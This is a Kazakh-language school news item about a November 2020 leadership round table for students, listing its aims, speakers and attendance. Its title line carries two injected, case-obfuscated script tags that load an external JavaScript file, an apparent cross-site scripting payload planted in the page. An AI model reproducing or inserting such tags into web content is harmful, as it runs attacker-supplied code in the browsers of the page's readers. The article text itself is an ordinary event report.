круглый стол<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
10.11.2020
10 қараша күні сағат 12.00-де ПДН-да тіркелген белсенділермен және оқушылармен «КӨШБАСШЫЛЫҚ: НЕГІЗГІ МӘСЕЛЕЛЕР ЖӘНЕ ДАМУ ӘДІСТЕРІ» атты дөңгелек үстел өтті.
Бұл іс-шараның мақсаты - әр түрлі қызметте өзіндік жетістікке жетуге бағытталған жасөспірімдердің көшбасшылық қасиеттерін және тұлғаның өзін-өзі дамытуға жағдай жасау.
Міндеттері:
-Балаларда қоғамдағы әлеуметтік бейімделу мен табысты қызметке қажетті теориялық және практикалық білімдерді, қабілеттерді, дағдыларды қалыптастыру; өзін-өзі бағалау қабілетін қалыптастыру;
-ұжымдық іс-әрекет арқылы көшбасшылық қабілеттерді жинақтау;
- шешім қабылдау қабілетін және бастама мен жауапкершілікті қабылдауға дайындықты қалыптастыру.
- оқушылардың шығармашылық және ұйымдастырушылық қабілеттерін, топта, ұжымда жұмыс істеу дағдыларын дамыту;
-өзіне деген қызығушылықты дамыту, өзін-өзі тану мәдениетін қалыптастыру, өзін-өзі дамыту және өзін-өзі тәрбиелеу.
Дөңгелек үстел жұмысына қатысқандар:
- №23 өрт бөлімі басшысының орынбасары–Кусаинов Фархат Сапиевич (КТИ-ға оқуға түсу, «Абайла, жұқа мұз!»);
- Фермерлік шаруашылық мамандығы бойынша өндірістік оқу шебері - Кулиш Елена Александровна (Кәсіптік бағдар беру);
- Құқық бұзушылықтың алдын алу бойынша әдіскер –Шарабака Алена Петровна (Мектептегі бітімгершілік қызметі);
- Мектептің өзін өзі басқару жұмысы– Ақсай орта мектебінің 9 «Б» сынып оқушысы;
- Мектептік өкілдіктер – АББ тәрбие жұмысы бойынша әдіскер Хангишиева Джамиля Гаджиевна.
Дөңгелек үстел жұмысы диалог алаңы форматында өтті, оқушылар өз сұрақтарына жауап алды.
Қатысушы оқушылар саны 70 адамды құрады.